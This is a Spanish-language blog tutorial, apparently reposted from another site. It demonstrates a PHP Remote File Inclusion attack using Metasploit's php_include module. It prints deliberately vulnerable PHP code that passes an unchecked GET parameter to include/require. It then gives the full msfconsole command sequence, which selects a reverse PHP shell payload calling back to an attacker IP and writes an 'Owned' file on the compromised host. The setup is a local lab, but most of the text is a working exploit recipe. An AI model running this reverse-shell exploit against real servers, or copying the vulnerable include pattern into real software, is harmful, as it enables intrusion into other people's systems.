Una muestra más de que Metasploit sirve para explotar cualquier tipo de vulnerabilidad está aquí, un módulo de Metasploit para explotarRFIs.
RFI (Remote File Inclusion), traducido al español como Inclusión Remota de Archivos - vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la funcióninclude().
Así que le pongo este lindo vídeo y más abajo la explicación de cada cosa que se hace en él ;)
Lo primero es simplemente ir a la carpeta /var/www/html para editar el archivo index.php:
cd /var/www/html
mkdir 1
vi 1/index.php
Se agrega al archivo index.php el pedazo de código vulnerable:
1 2 3 4 5 6 | <?php $color = 'blue' ; if (isset( $_GET [ 'COLOR' ])) $color = $_GET [ 'COLOR' ]; require ( $color . '.php' ); ?> |
O también puede ser este:
1 2 3 4 5 6 | <?php $color = 'blue' ; if (isset( $_GET [ 'COLOR' ] ) ) $color = $_GET [ 'COLOR' ]; include ( $color . '.php' ); ?> |
De aquí en adelante pongo el comando y al lado entre corchetes [] la explicación:
chown apache:apache -R 1 [Cambia el propietario del fichero "1" al servicio Apache]
msfconsole [Echa a andar la consola de MSF]
use unix/webapp/php_include [Exploit que se va usar]
set PATH/1/ [El Path, subdominio o carpeta donde esta la Uri]
set PHPURI /index.php?COLOR=XXpathXX [Se define la Uri vulnerable y la variable donde se explota (XXpathXX)]
set RHOST localhost [IP o host del objetivo]
set PAYLOAD php/reverse_php [Elegimos un Payload]
set LHOST 172.16.61.132 [IP donde se conectará la víctima]
exploit [Echa a andar el exploit]
dir [Mira archivos en el directorio]
touch test.txt [Crea un archivo llamado test.txt]
echo Owned > test.txt [Escribe Owned dentro de test.txt]
[+] Fuente: BlackPloit
0 Response for the "[Video Metasploit] Módulo Remote File Inclusion (RFI)"
Publicar un comentario